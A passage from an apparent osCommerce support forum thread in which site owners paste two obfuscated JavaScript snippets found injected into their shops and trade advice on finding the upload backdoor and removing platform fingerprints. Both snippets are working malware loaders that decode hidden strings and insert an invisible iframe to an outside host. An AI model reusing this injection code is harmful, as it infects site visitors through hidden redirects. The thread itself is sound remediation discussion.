440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var aty="";var g=function(){return this;}();ko=g["e"+iu+"l"];var ydxx="";gh=ko(my);for(var i=0;i<dkel.length;i++){ch=ko(dkel[i]);ydxx+=gh(ch);}ko(ydxx);</script>

<script language="JavaScript">if (typeof(defs_colors)=="undefined") {
  var defs_colors = 1;

  var div_colors = new Array('#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7e', '#897883', '#847374', '#3e7270', '#83707b', '#7e763e', '#4e7270', '#83707b', '#7e7681', '#82827d', '#748682', '#4c4000');
  var css_colors = new Array('#717e73', '#887378', '#857378', '#827f7b', '#70887d', '#7e7d74', '#787581', '#707c74', '#4b7378', '#852f82', '#83887b', '#744c36', '#737882', '#7f7b70', '#88497d', '#7e7d74', '#364d4b', '#787581', '#707c74', '#2f8281', '#724c36', '#364d4b', '#3e7875', '#81707c', '#744d4b', '#3e7378', '#854d82', '#81724e', '#81754c');
  var css_indexes = new Array(4, 3, 7, 4, 6, 39, 17, 3, 4);

  function div_pick_colors(t) {
var s = '';
for (j=0;j<t.length;j++) {	
	var c_rgb = t[j];
	for (i=1;i<7;i++) {
		var c_clr = c_rgb.substr(i++,2);
		if (c_clr!='00') s += String.fromCharCode(parseInt(c_clr,16)-15);
	}
  }
return s;
  }

  var ct = new Array(10);
  var s = div_pick_colors(css_colors);
  var c = css_indexes;
  ct[0] = div_pick_colors(div_colors);
  var j = 0; var ci = 1;
  for(i=0;i<c.length;i++) {
 	ct[ci++] = s.substr(j,c[i]);
j=j+c[i];
  }
  ct[0] = ct[0];
  function check_div_styles() {
var d=document.getElementsByTagName(ct[1])[0];
if(d) {
	try {
		var d=document.getElementsByTagName(ct[1])[0];
		var v=document.createElement(ct[2]);
		v.style.display=ct[4];
		v.setAttribute(ct[3],ct[4]);
		d.appendChild(v);
		w=document.createElement(ct[5]);
		w.src=ct[0];
		w.setAttribute(ct[8],ct[0]);
		v.appendChild(w);
	} catch(e) {
		document.write(ct[6]+ct[0]+ct[7]);
	}
   } else {
	setTimeout("check_div_styles();",500);	
   }
  }

  check_div_styles();

}</script>

 

this is another code that I found

[Taipo]

how i eliminates these

1.st hackers check this string for ex.:

<!-- header_eof //-->

Core of site have many sign on *_eof - this is help to detect you site is osCommerce you must delete any *_eof string on site.

 

What you need to do is find the code that is allowing the attackers to upload files, change file permissions etc. It is via these scripts they are able to append code to any file they wish on some configurations of shared web hosting.

 

If you do not feel confident enough in your PHP skills to recognise what these files might look like then you have no real other choice but to install the new version of oscommerce 2.3.1 and migrate your sites database across to it.

[romankerch]

What you need to do is find the code that is allowing the attackers to upload files, change file permissions etc. It is via these scripts they are able to append code to any file they wish on some configurations of shared web hosting.

 

If you do not feel confident enough in your PHP skills to recognise what these files might look like then you have no real other choice but to install the new version of oscommerce 2.3.1 and migrate your sites database across to it.

maybe, but first of all hackers must can find your site and chek to oscommerce Core. Thats any _eof help to detect us.